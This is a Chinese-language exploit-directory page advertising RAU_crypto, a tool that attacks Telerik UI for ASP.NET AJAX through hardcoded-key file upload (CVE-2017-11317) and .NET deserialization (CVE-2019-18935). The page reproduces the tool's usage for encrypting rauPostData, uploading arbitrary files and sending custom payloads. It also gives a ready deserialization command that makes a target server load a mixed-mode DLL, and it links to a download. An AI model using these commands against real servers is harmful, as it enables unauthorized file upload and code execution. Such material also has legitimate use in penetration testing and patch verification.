Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE_2019_18935 — 本项目针对 CVE-2019-18935 | Kitploit
工具/GitHubGitHub/thanhuutuan/cve_2019_18935
加密/解密工具Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubthanhuutuan/cve_2019_18935

CVE_2019_18935

本项目针对 CVE-2019-18935

查看仓库
226年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RAU_crypto

Language

针对 Telerik UI for ASP.NET AJAX 的组合利用工具。

  • CVE-2017-11317 和 CVE-2017-11357 的文件上传 - 自动上传文件
  • CVE-2019-18935 的 .NET 反序列化

利用通常需要包含硬编码密钥的版本,或者需要知道密钥(例如能获取到 web.config 的内容)。该工具也支持直接解密和加密用于 Telerik.Web.UI.WebResource.axd?type=rau 的 rauPostData 数据。

要求

  • python >= 3.6 并安装 pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) - 通过 pip3 install pycryptodome 或 pip3 install pycryptodomex 安装

已发布在 exploit-db (旧版本)

  • https://www.exploit-db.com/exploits/43874/

另请参阅

我的另一个 Telerik UI 利用工具(针对 CVE-2017-9248)可能也会引起你的兴趣。地址如下:

  • https://github.com/bao7uo/dp_crypto

待办

  • 缺失的对更高版本的 HMAC 功能。
  • 支持指定自定义密钥。
  • 命令行参数用于执行混合模式 DLL(在此之前请使用下面提供的 .NET 反序列化 payload 示例)。
  • 用于测试混合模式 DLL 的独立工具。
  • 提供混合模式 DLL 的源代码/编译说明。
  • 暴力破解版本。

注意 - 最后四项已完成但尚未发布。

漏洞

文件上传漏洞(CVE-2017-11317)由其他人发现,相信归功于 @straight_blast @pwntester @olekmirosh 。该漏洞公布后不久,我在工作中遇到了 Telerik 库,因此研究了该漏洞并于 2017 年 7 月编写了此利用工具。我还报告了相关的 CVE-2017-11357(不安全直接对象引用)。

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

.NET 反序列化漏洞(CVE-2019-18935)由 @mwulftange 发现。

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

用法

root@kitploit:~
$ ./RAU_crypto.py 

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version format:    2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS
$

示例 - 解密

解密截图

示例 - 任意文件上传

上传截图

自定义 payload(.NET 反序列化)

关于 .NET 反序列化自定义 payload 的详细信息,请参阅 @mwulftange 在 Code White 博客上发表的精彩文章(该漏洞的发现者),链接如下。

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

其他相关链接。

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

.NET 反序列化 payload 示例:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

关于混合模式 DLL,请参阅我的另一个 GitHub 仓库:

  • https://github.com/bao7uo/MixedUp

特别感谢 @irsdl 对自定义 payload 功能的启发。

下载工具